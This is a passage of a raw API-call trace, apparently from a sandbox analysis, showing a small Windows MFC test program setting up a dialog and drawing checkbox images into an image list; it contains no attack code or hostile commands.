LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x52e608 [0041.838] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x2012) returned 0x2042ac0 [0041.838] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0xc) returned 0x20417d8 [0041.838] LocalAlloc (uFlags=0x40, uBytes=0x188) returned 0x5318e0 [0041.838] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x2a) returned 0x20417f0 [0041.838] LocalAlloc (uFlags=0x40, uBytes=0x64) returned 0x52ead0 [0041.838] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x2a) returned 0x2041828 [0041.838] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x538498 [0041.838] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x28) returned 0x2041860 [0041.838] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.839] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.839] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.839] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.840] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.840] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc05f [0041.840] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.841] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.841] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.842] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.842] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.842] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0041.843] GetSystemMetrics (nIndex=11) returned 32 [0042.259] GetSystemMetrics (nIndex=12) returned 32 [0042.259] GetSystemMetrics (nIndex=2) returned 17 [0042.259] GetSystemMetrics (nIndex=3) returned 17 [0042.259] GetDC (hWnd=0x0) returned 0x60100ce [0042.259] GetDeviceCaps (hdc=0x60100ce, index=88) returned 96 [0042.259] GetDeviceCaps (hdc=0x60100ce, index=90) returned 96 [0042.259] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0042.259] GetSysColor (nIndex=15) returned 0xf0f0f0 [0042.259] GetSysColor (nIndex=16) returned 0xa0a0a0 [0042.259] GetSysColor (nIndex=20) returned 0xffffff [0042.259] GetSysColor (nIndex=18) returned 0x0 [0042.259] GetSysColor (nIndex=6) returned 0x646464 [0042.259] GetSysColorBrush (nIndex=15) returned 0x100072 [0042.259] GetSysColorBrush (nIndex=6) returned 0x10007a [0042.259] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0042.260] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0042.260] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0042.260] LoadLibraryW (lpLibFileName="UxTheme.dll") returned 0x73d30000 [0042.261] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0042.261] GetCursorPos (in: lpPoint=0x5322fc | out: lpPoint=0x5322fc*(x=434, y=760)) returned 1 [0042.262] LocalAlloc (uFlags=0x40, uBytes=0x54) returned 0x537538 [0042.262] LocalReAlloc (hMem=0x536e50, uBytes=0xc, uFlags=0x2) returned 0x53da68 [0042.262] GetCurrentThread () returned 0xfffffffe [0042.262] GetCurrentThreadId () returned 0x13e4 [0042.262] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0042.262] LoadLibraryW (lpLibFileName="UxTheme.dll") returned 0x73d30000 [0042.263] RtlSizeHeap (HeapHandle=0x2040000, Flags=0x0, MemoryPointer=0x2042810) returned 0x80 [0042.263] RegisterClipboardFormatW (lpszFormat="WM_XHYPERLINK_CLICKED") returned 0xc19b [0042.263] SetErrorMode (uMode=0x0) returned 0x0 [0042.263] SetErrorMode (uMode=0x8001) returned 0x0 [0042.263] GetModuleHandleW (lpModuleName="KERNEL32") returned 0x74030000 [0042.263] GetProcAddress (hModule=0x74030000, lpProcName="CreateActCtxW") returned 0x74047840 [0042.264] GetProcAddress (hModule=0x74030000, lpProcName="ReleaseActCtx") returned 0x74047810 [0042.264] GetProcAddress (hModule=0x74030000, lpProcName="ActivateActCtx") returned 0x740477e0 [0042.264] GetProcAddress (hModule=0x74030000, lpProcName="DeactivateActCtx") returned 0x74047860 [0042.264] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19fcb0, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\createcheckboximagelisttest.exe")) returned 0x37 [0042.264] CreateActCtxW (pActCtx=0x19fc90) returned 0xffffffff [0042.264] CreateActCtxW (pActCtx=0x19fc90) returned 0xffffffff [0042.264] CreateActCtxW (pActCtx=0x19fc90) returned 0x5325c4 [0042.272] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19fcb4, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\createcheckboximagelisttest.exe")) returned 0x37 [0042.272] PathFindExtensionW (pszPath="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe") returned=".exe" [0042.272] PathFindFileNameW (pszPath="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest") returned="CreateCheckboxImageListTest" [0042.272] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x38) returned 0x2041890 [0042.273] FindResourceW (hModule=0x400000, lpName=0xe01, lpType=0x6) returned 0x0 [0042.273] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x38) returned 0x20418d0 [0042.273] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x70) returned 0x2041910 [0042.273] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x8, Size=0x40) returned 0x2041988 [0042.273] GetCurrentThreadId () returned 0x13e4 [0042.273] SetWindowsHookExW (idHook=-1, lpfn=0x40bbd5, hmod=0x0, dwThreadId=0x13e4) returned 0x330115 [0042.273] GetModuleHandleW (lpModuleName="user32.dll") returned 0x769e0000 [0042.273] GetProcAddress (hModule=0x769e0000, lpProcName="NotifyWinEvent") returned 0x769f28d0 [0042.273] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", ulOptions=0x0, samDesired=0x1, phkResult=0x19fed0 | out: phkResult=0x19fed0*=0x0) returned 0x2 [0042.273] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network", ulOptions=0x0, samDesired=0x1, phkResult=0x19fed0 | out: phkResult=0x19fed0*=0x0) returned 0x2 [0042.273] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32", ulOptions=0x0, samDesired=0x1, phkResult=0x19fed0 | out: phkResult=0x19fed0*=0x0) returned 0x2 [0042.274] LoadIconW (hInstance=0x400000, lpIconName=0x80) returned 0xb00cf [0042.275] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0x5) returned 0x43f908 [0042.276] LoadResource (hModule=0x400000, hResInfo=0x43f908) returned 0x4416d4 [0042.276] LockResource (hResData=0x4416d4) returned 0x4416d4 [0042.276] GetCurrentThreadId () returned 0x13e4 [0042.276] SetWindowsHookExW (idHook=5, lpfn=0x408c05, hmod=0x0, dwThreadId=0x13e4) returned 0xe00083 [0042.276] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x60) returned 0x20419d0 [0042.277] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73af0000 [0042.277] GetProcAddress (hModule=0x73af0000, lpProcName="InitCommonControlsEx") returned 0x73b6a480 [0042.277] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.277] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.278] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0001) returned 1 [0042.278] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.278] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.278] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0003) returned 1 [0042.279] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.279] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.279] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0005) returned 1 [0042.279] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.279] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.279] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0007) returned 1 [0042.279] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.279] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.281] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0009) returned 1 [0042.281] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.281] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.281] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e000b) returned 1 [0042.281] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fc9c | out: hActCtx=0x5325c4, lpCookie=0x19fc9c) returned 1 [0042.281] InitCommonControlsEx (picce=0x19fd20) returned 1 [0042.281] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e000d) returned 1 [0042.281] GetVersionExW (in: lpVersionInformation=0x19fc18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fc18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0042.282] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19fbec | out: hActCtx=0x5325c4, lpCookie=0x19fbec) returned 1 [0042.282] GetModuleHandleW (lpModuleName="shell32.dll") returned 0x74a80000 [0042.282] GetProcAddress (hModule=0x74a80000, lpProcName="InitNetworkAddressControl") returned 0x74cf3710 [0042.282] InitNetworkAddressControl () returned 1 [0042.284] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e000f) returned 1 [0042.284] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x2c) returned 0x2041a38 [0042.284] CreateDialogIndirectParamW (hInstance=0x400000, lpTemplate=0x4416d4, hWndParent=0x0, lpDialogFunc=0x403ac4, dwInitParam=0x0) [0042.693] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19f5ac | out: hActCtx=0x5325c4, lpCookie=0x19f5ac) returned 1 [0042.693] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x44) returned 0x2044ae0 [0042.693] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x7c) returned 0x2044b30 [0042.693] GetParent (hWnd=0x302dc) returned 0x0 [0042.694] SetWindowLongW (hWnd=0x302dc, nIndex=-4, dwNewLong=4225620) returned 2000770896 [0042.694] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0011) returned 1 [0042.694] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x302dc, lParam=0x19f830) returned 0x0 [0042.695] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x81, wParam=0x0, lParam=0x19f880) returned 0x1 [0042.697] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19f52c | out: hActCtx=0x5325c4, lpCookie=0x19f52c) returned 1 [0042.697] GetClassInfoExW (in: hInstance=0x0, lpszClass="#32768", lpwcx=0x19f57c | out: lpwcx=0x19f57c) returned 1 [0042.697] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0012) returned 1 [0042.697] GetClassLongW (hWnd=0x402ba, nIndex=-32) returned 0xc026 [0042.697] GetWindowLongW (hWnd=0x402ba, nIndex=-4) returned 1990213872 [0042.697] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x0 [0042.697] SetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423", hData=0x76a040f0) returned 1 [0042.697] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.697] GlobalAddAtomW (lpString="AfxOldWndProc423") returned 0xc0ed [0042.697] SetWindowLongW (hWnd=0x402ba, nIndex=-4, dwNewLong=4229816) returned 2000771056 [0042.698] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x402ba, lParam=0x19f830) returned 0x0 [0042.698] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.698] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x402ba, Msg=0x81, wParam=0x0, lParam=0x19f880) returned 0x1 [0042.699] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.699] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x402ba, Msg=0x83, wParam=0x0, lParam=0x19f86c) returned 0x0 [0042.699] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.699] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x402ba, Msg=0x1, wParam=0x0, lParam=0x19f880) returned 0x0 [0042.699] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.700] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x402ba, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0042.700] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.700] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x402ba, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0042.702] GetPropW (hWnd=0x402ba, lpString="AfxOldWndProc423") returned 0x76a040f0 [0042.702] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x402ba, Msg=0x287, wParam=0x21, lParam=0x0) returned 0x0 [0042.703] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x83, wParam=0x0, lParam=0x19f86c) returned 0x0 [0042.964] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x1, wParam=0x0, lParam=0x19f880) returned 0x0 [0042.965] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x5, wParam=0x0, lParam=0x11b01e0) returned 0x0 [0042.965] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x3, wParam=0x0, lParam=0x1a0003) returned 0x0 [0042.971] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x60) returned 0x2044bb8 [0042.971] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x204) returned 0x2044c20 [0042.971] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x1c) returned 0x2041a70 [0042.971] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x34) returned 0x2044e30 [0042.972] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x30, wParam=0x420a0690, lParam=0x0) returned 0x0 [0042.973] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x60044, lParam=0x19f830) returned 0x0 [0042.979] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x55, wParam=0x60044, lParam=0x3) returned 0x2 [0042.979] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0042.982] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x5002c, lParam=0x19f830) returned 0x0 [0042.984] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x60068, lParam=0x19f830) returned 0x0 [0042.985] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x55, wParam=0x60068, lParam=0x3) returned 0x2 [0042.985] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0042.986] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x7005a, lParam=0x19f830) returned 0x0 [0042.988] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x55, wParam=0x7005a, lParam=0x3) returned 0x2 [0042.988] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0042.989] GetWindowRect (in: hWnd=0x302dc, lpRect=0x19fa08 | out: lpRect=0x19fa08) returned 1 [0042.989] GetWindowLongW (hWnd=0x302dc, nIndex=-16) returned -2067136316 [0042.989] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x110, wParam=0x60044, lParam=0x0) [0042.989] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0xf0) returned 0x0 [0042.989] GetTopWindow (hWnd=0x302dc) returned 0x60044 [0042.989] SendMessageW (hWnd=0x60044, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0042.989] GetWindow (hWnd=0x60044, uCmd=0x2) returned 0x5002c [0042.989] SendMessageW (hWnd=0x5002c, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0042.989] GetWindow (hWnd=0x5002c, uCmd=0x2) returned 0x60068 [0042.989] SendMessageW (hWnd=0x60068, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0042.989] GetWindow (hWnd=0x60068, uCmd=0x2) returned 0x7005a [0042.989] SendMessageW (hWnd=0x7005a, Msg=0x364, wParam=0x0, lParam=0x0) returned 0x0 [0042.989] GetWindow (hWnd=0x7005a, uCmd=0x2) returned 0x0 [0042.989] GetDlgItem (hDlg=0x302dc, nIDDlgItem=1003) returned 0x7005a [0042.989] GetDlgItem (hDlg=0x302dc, nIDDlgItem=1003) returned 0x7005a [0042.990] GetParent (hWnd=0x7005a) returned 0x302dc [0042.990] SetWindowLongW (hWnd=0x7005a, nIndex=-4, dwNewLong=4225620) returned 1941235712 [0042.990] GetParent (hWnd=0x7005a) returned 0x302dc [0042.990] GetDlgItem (hDlg=0x302dc, nIDDlgItem=1003) returned 0x7005a [0042.990] GetDlgItem (hDlg=0x302dc, nIDDlgItem=1003) returned 0x7005a [0042.990] SendMessageW (hWnd=0x7005a, Msg=0xf1, wParam=0x1, lParam=0x0) returned 0x0 [0042.990] CallWindowProcW (lpPrevWndFunc=0x73b4e800, hWnd=0x7005a, Msg=0xf1, wParam=0x1, lParam=0x0) returned 0x0 [0042.990] GetDlgItem (hDlg=0x302dc, nIDDlgItem=57670) returned 0x0 [0042.991] GetSystemMenu (hWnd=0x302dc, bRevert=0) returned 0xa00c9 [0042.991] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x60) returned 0x2044e70 [0042.991] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x204) returned 0x2044ed8 [0042.991] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x1c) returned 0x20450e8 [0042.991] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x34) returned 0x2045110 [0042.991] FindResourceW (hModule=0x400000, lpName=0x7, lpType=0x6) returned 0x43f938 [0042.991] LoadResource (hModule=0x400000, hResInfo=0x43f938) returned 0x441924 [0042.991] LockResource (hResData=0x441924) returned 0x441924 [0042.991] SizeofResource (hModule=0x400000, hResInfo=0x43f938) returned 0x162 [0042.991] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x5c) returned 0x2045150 [0042.992] AppendMenuW (hMenu=0xa00c9, uFlags=0x800, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0042.994] AppendMenuW (hMenu=0xa00c9, uFlags=0x0, uIDNewItem=0x10, lpNewItem="&About CreateCheckboxImageListTest...") returned 1 [0042.995] HeapFree (in: hHeap=0x2040000, dwFlags=0x0, lpMem=0x2045150 | out: hHeap=0x2040000) returned 1 [0042.995] SendMessageW (hWnd=0x302dc, Msg=0x80, wParam=0x1, lParam=0xb00cf) returned 0x0 [0042.995] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x80, wParam=0x1, lParam=0xb00cf) returned 0x0 [0042.997] SendMessageW (hWnd=0x302dc, Msg=0x80, wParam=0x0, lParam=0xb00cf) returned 0x0 [0042.997] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x80, wParam=0x0, lParam=0xb00cf) returned 0x0 [0042.998] GetDlgItem (hDlg=0x302dc, nIDDlgItem=1002) returned 0x5002c [0042.998] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x1504) returned 0x2045150 [0042.998] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x1c) returned 0x2046660 [0042.998] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x34) returned 0x2046688 [0042.998] GetParent (hWnd=0x5002c) returned 0x302dc [0042.998] GetWindowRect (in: hWnd=0x5002c, lpRect=0x19f5fc | out: lpRect=0x19f5fc) returned 1 [0042.998] ScreenToClient (in: hWnd=0x302dc, lpPoint=0x19f5fc | out: lpPoint=0x19f5fc) returned 1 [0042.999] ScreenToClient (in: hWnd=0x302dc, lpPoint=0x19f604 | out: lpPoint=0x19f604) returned 1 [0042.999] GetWindowLongW (hWnd=0x302dc, nIndex=-20) returned 327937 [0042.999] VirtualProtect (in: lpAddress=0x433268, dwSize=0x78a6, flNewProtect=0x40, lpflOldProtect=0x19f5f4 | out: lpflOldProtect=0x19f5f4*=0x8) returned 1 [0042.999] GetDlgItem (hDlg=0x302dc, nIDDlgItem=1002) returned 0x5002c [0042.999] GetParent (hWnd=0x5002c) returned 0x302dc [0042.999] ShowWindow (hWnd=0x5002c, nCmdShow=0) returned 1 [0042.999] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x88) returned 0x20466c8 [0043.000] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19f444 | out: hActCtx=0x5325c4, lpCookie=0x19f444) returned 1 [0043.000] GetClassInfoW (in: hInstance=0x400000, lpClassName="AfxWnd90su", lpWndClass=0x19f48c | out: lpWndClass=0x19f48c) returned 0 [0043.000] GetLastError () returned 0x583 [0043.000] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0015) returned 1 [0043.000] SetLastError (dwErrCode=0x583) [0043.000] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19f44c | out: hActCtx=0x5325c4, lpCookie=0x19f44c) returned 1 [0043.000] RegisterClassW (lpWndClass=0x19f4dc) returned 0xc1a9 [0043.000] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0016) returned 1 [0043.000] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19f4d4 | out: hActCtx=0x5325c4, lpCookie=0x19f4d4) returned 1 [0043.000] CreateWindowExW (dwExStyle=0x200, lpClassName="AfxWnd90su", lpWindowName="", dwStyle=0x50100000, X=15, Y=41, nWidth=450, nHeight=195, hWndParent=0x302dc, hMenu=0x3e7, hInstance=0x400000, lpParam=0x0) returned 0x502c4 [0043.001] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19ed6c | out: hActCtx=0x5325c4, lpCookie=0x19ed6c) returned 1 [0043.001] GetParent (hWnd=0x502c4) returned 0x10012 [0043.001] SetWindowLongW (hWnd=0x502c4, nIndex=-4, dwNewLong=4225620) returned 1943929152 [0043.001] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0018) returned 1 [0043.001] CallNextHookEx (hhk=0xe00083, nCode=3, wParam=0x502c4, lParam=0x19eff0) returned 0x0 [0043.001] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x502c4, Msg=0x81, wParam=0x0, lParam=0x19f040) returned 0x1 [0043.002] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x502c4, Msg=0x83, wParam=0x0, lParam=0x19f02c) returned 0x0 [0043.005] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x502c4, Msg=0x1, wParam=0x0, lParam=0x19f040) returned 0x0 [0043.005] GetClientRect (in: hWnd=0x502c4, lpRect=0x204673c | out: lpRect=0x204673c) returned 1 [0043.005] GetDC (hWnd=0x502c4) returned 0x10105c7 [0043.005] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x60) returned 0x2046758 [0043.005] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x404) returned 0x20467c0 [0043.005] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x1c) returned 0x2046bd0 [0043.005] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x34) returned 0x2046bf8 [0043.005] GetSysColor (nIndex=5) returned 0xffffff [0043.005] CreateCompatibleBitmap (hdc=0x10105c7, cx=256, cy=16) returned 0x57050527 [0043.005] ImageList_Create (cx=16, cy=16, flags=0x20, cInitial=16, cGrow=1) returned 0x54a248 [0043.007] CreateCompatibleDC (hdc=0x10105c7) returned 0x1c010522 [0043.007] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x3705053c [0043.007] CreateCompatibleDC (hdc=0x10105c7) returned 0x310105e8 [0043.007] SelectObject (hdc=0x310105e8, h=0x3705053c) returned 0x85000f [0043.007] GetProcAddress (hModule=0x73d30000, lpProcName="IsThemeActive") returned 0x73d62890 [0043.007] IsThemeActive () returned 0x1 [0043.007] GetProcAddress (hModule=0x73d30000, lpProcName="IsAppThemed") returned 0x73d625a0 [0043.007] IsAppThemed () returned 0x1 [0043.007] GetProcAddress (hModule=0x73d30000, lpProcName="OpenThemeData") returned 0x73d54220 [0043.007] OpenThemeData () returned 0x10001 [0043.007] SelectObject (hdc=0x1c010522, h=0x57050527) returned 0x85000f [0043.007] SetBkColor (hdc=0x1c010522, color=0xffffff) returned 0xffffff [0043.007] ExtTextOutW (hdc=0x1c010522, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.007] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.007] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.007] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.008] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.008] GetProcAddress (hModule=0x73d30000, lpProcName="DrawThemeBackground") returned 0x73d5b760 [0043.008] DrawThemeBackground () returned 0x0 [0043.009] GetProcAddress (hModule=0x73d30000, lpProcName="DrawThemeEdge") returned 0x73d8ca70 [0043.010] DrawThemeEdge () returned 0x0 [0043.011] StretchBlt (hdcDest=0x1c010522, xDest=16, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.011] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.011] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.011] DrawThemeBackground () returned 0x0 [0043.011] DrawThemeEdge () returned 0x0 [0043.011] StretchBlt (hdcDest=0x1c010522, xDest=32, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.011] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.011] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.011] DrawThemeBackground () returned 0x0 [0043.012] DrawThemeEdge () returned 0x0 [0043.012] StretchBlt (hdcDest=0x1c010522, xDest=48, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW 